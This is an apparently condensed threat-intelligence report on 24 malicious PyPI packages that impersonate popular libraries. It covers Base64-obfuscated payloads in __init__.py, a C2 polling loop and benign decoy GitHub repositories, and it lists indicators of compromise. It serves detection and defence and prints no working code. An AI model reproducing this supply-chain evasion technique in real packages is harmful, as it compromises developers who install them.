Keypoints
- ReversingLabs identified 24 malicious PyPI packages impersonating popular libraries (e.g., vConnector, eth-tester, databases).
- Malicious functionality was embedded in release artifacts (not in linked GitHub source), notably in __init__.py files containing Base64-encoded payloads.
- Decoded payloads spawn processes, build a host‑specific C2 URL (replacing “paperpin3902” with platform initial, username, and a 6‑char random string), and enter an endless fetch/execute loop for further Base64 commands.
- The C2 infrastructure included domains and an IP (e.g., ethertestnet.pro, deliworkshopexpress.xyz, 45.61.139.219) but served no observed commands during analysis, suggesting request filtering or selective targeting.
- Attackers created matching GitHub projects with benign code to misdirect reviewers and automated source scans, hiding malicious code only in the packaged release artifacts.
- Packages were removed from PyPI within days, but the adversary repeatedly posted replacements, indicating an ongoing, organized supply‑chain campaign.
MITRE Techniques
- [T1027] Obfuscated Files or Information – uses Base64 encoding to hide malicious payloads (‘Base64 encoded string’).
- [T1059] Command and Scripting Interpreter – decoded payload is executed in a spawned process (‘decoded and executed in another process’).
- [T1105] Ingress Tool Transfer – downloads additional Base64‑encoded commands from a command and control server (‘attempts to download another Base64 encoded string with additional commands’).
- [T1071] Application Layer Protocol – contacts a remote C2 server over web protocols to fetch commands (‘contacts the command and control (C2) server and attempts to download…’).
Indicators of Compromise
- [IP address] C2 server – 45.61.139.219
- [Domain] Command-and-control domains – ethertestnet.pro, deliworkshopexpress.xyz
- [PyPI package] Malicious package names/versions – VMConnect (1.1.7), ethter (1.10.1b1), and others (e.g., quantiumbase, osinfopkg)
- [File hash – SHA1] Release artifact hashes – b0095f149951241c6e11e0d1be1f74e8cdfbdbb2, d404a55f1f7fbcd8b3156a84ebcf97c57ba24b95, and 20 more hashes
ReversingLabs’ Titanium static-analysis engine flagged a suspicious VMConnect release by extracting behavior indicators from the package artifact: process creation calls, Base64 decoding, and binary-to-string conversions inside the package’s __init__.py. Manual review of that file revealed a large Base64 string which is decoded and executed in a separate process; the decoded payload contains a template C2 URL and an execution loop that repeatedly polls the C2 for further Base64-encoded commands.
The embedded logic builds a host-specific C2 endpoint by replacing the token “paperpin3902” with a string composed of the host platform’s first letter, the username, and a random six-character suffix; it then sleeps and re-polls the C2 in an endless loop, executing any received decoded instructions. Although the C2 was reachable during analysis, no follow-on commands were served—consistent with selective targeting or request filtering by the operator.
To evade detection, the adversary published corresponding GitHub repositories containing benign __init__.py code while packaging malicious variants to PyPI releases, and impersonated popular packages (copied descriptions and versioning) to increase installs. The technical takeaway: security teams must analyze final release artifacts and behavior indicators (not just repository source) to detect Base64-obfuscated payloads that spawn processes, fetch secondary content from C2s, and execute dynamically delivered code.